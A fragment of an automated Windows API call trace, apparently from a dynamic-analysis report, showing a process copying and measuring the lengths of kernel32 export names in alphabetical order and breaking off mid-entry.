lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.874] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.874] lstrlenA (lpString="ADDATOMA") returned 8 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.874] lstrlenA (lpString="ADDATOMW") returned 8 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.874] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.874] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.874] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.874] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.874] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.874] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.874] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.874] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.874] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.874] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.874] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.874] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.874] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.874] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.875] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.875] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.875] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.875] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.875] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.875] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.875] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.875] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.875] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.875] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.875] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.875] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.875] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.875] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.875] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.875] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.875] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.875] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.875] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.876] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.876] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.876] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.876] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.876] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.876] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.876] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.876] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.876] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.876] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.876] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.876] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.876] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.876] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.876] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.876] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.876] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.876] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.876] lstrcpyA (in: lpString1=0x3f2c580, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.876] lstrlenA (lpString="BEEP") returned 4 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.877] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.877] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.877] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.877] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.877] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.877] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.877] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.877] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.877] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.877] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.877] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.877] lstrlenA (lpString="CANCELIO") returned 8 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.877] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.877] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.877] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.877] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.877] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.877] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.877] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.878] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.878] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.878] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.878] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.878] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.878] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.878] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.878] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.878] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.878] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.878] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.878] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.878] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.878] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.878] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.878] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.878] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.878] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.878] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.878] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.879] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.879] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.879] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.879] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.879] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.879] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.879] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.879] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.879] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.879] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.879] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.879] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.879] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.879] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.879] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.879] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.879] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.879] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.879] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.880] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.880] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.880] lstrlenA (lpString="COPYFILEA") returned 9 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.880] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.880] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.880] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.880] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.880] lstrlenA (lpString="COPYFILEW") returned 9 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.880] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.880] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.880] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.880] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.880] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.880] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.880] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") 